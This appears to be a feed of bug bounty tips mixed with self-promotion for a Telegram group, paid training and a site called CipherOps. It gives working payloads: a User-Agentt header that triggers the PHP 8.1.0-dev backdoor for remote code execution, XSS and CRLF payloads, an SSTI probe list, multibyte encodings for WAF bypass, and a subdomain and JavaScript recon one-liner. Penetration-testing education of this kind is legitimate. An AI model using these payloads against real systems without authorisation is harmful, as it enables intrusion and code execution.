Bug bounty Tips

From 0 to 726 views per week. starting is a best and beautiful option u do and thanks to u guys also

u guys can join and explain me here https://t.me/bug_hunting_talks, we can talk i need your suggestions its an humble request

Guys, i want your response, planning to start a bugbounty live classes training. for 2 months and 2 months internships for 20k is it going to work or not.

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

Bug Bounty Tip When the app only accepts URLs with a specific scheme, try injecting javascript://test.com Then, use these symbols to craft an XSS payload 🔹%0a 🔹%0d 🔹%E2%80%A8 🔹%E2%80%A9 ✅ javascript://test.com%0aalert(1)

Bug Bounty Tip SSTI (Server Side Template Injection) Payload List 🔹{7*7} 🔹*{7*7} 🔹{{7*7}} 🔹[[7*7]] 🔹${7*7} 🔹@(7*7) 🔹 🔹<%= 7*7 %> 🔹${= 7*7} 🔹{{= 7*7}} 🔹${{7*7}} 🔹#{7*7} 🔹[=7*7] If evaluated as 49 - the target is vulnerable Cheers!

"🤖 Scan this QR code if you want to know what's cookin' at CipherOps! 🍳🕵️‍♂️ Unravel the mysteries of cyberworld at cipherops.tech. It's like a secret menu for techies! 🌐🔓 #CipherOps #TechMystery #QRAdventure"

Bug Bounty Tip GBK Encoding / MultiByte Attack 嘊 = %E5%98%8A = \u560a ⇒ %0A 嘍 = %E5%98%8D = \u560d ⇒ %0D 嘾 = %E5%98%BE = \u563e ⇒ %3E (>) 嘼 = %E5%98%BC = \u563c ⇒ %3C (<) 嘢 = %E5%98%A2 = \u5622 ⇒ %22 (') 嘧 = %E5%98%A7 = \u5627 ⇒ %27 (") For XSS, CRLF, WAF bypass

I am looking for a contributors any one intrested can contribute on github [https://github.com/Adwaithsheety/Cipherops]

To extract JavaScript files using a one-liner with the following tools: haktrails, httpx, getjs, anew, and tojson, you can use the following command: haktrails -d example.com | httpx -silent | getjs -c 200 - | anew -q jsfiles.txt | tojson Here's what this one-liner does step by step: haktrails -d example.com: Uses haktrails to discover subdomains of example.com. httpx -silent: Uses httpx to fetch the live subdomains and websites associated with example.com. getjs -c 200 -: Uses getjs to extract JavaScript files from the discovered websites. The -c 200 flag specifies a concurrency level of 200 for faster scanning, and the hyphen (-) reads input from the previous command. anew -q jsfiles.txt: Uses anew to filter out duplicate JavaScript file URLs and stores them in a file called jsfiles.txt. tojson: Converts the list of JavaScript URLs into JSON format.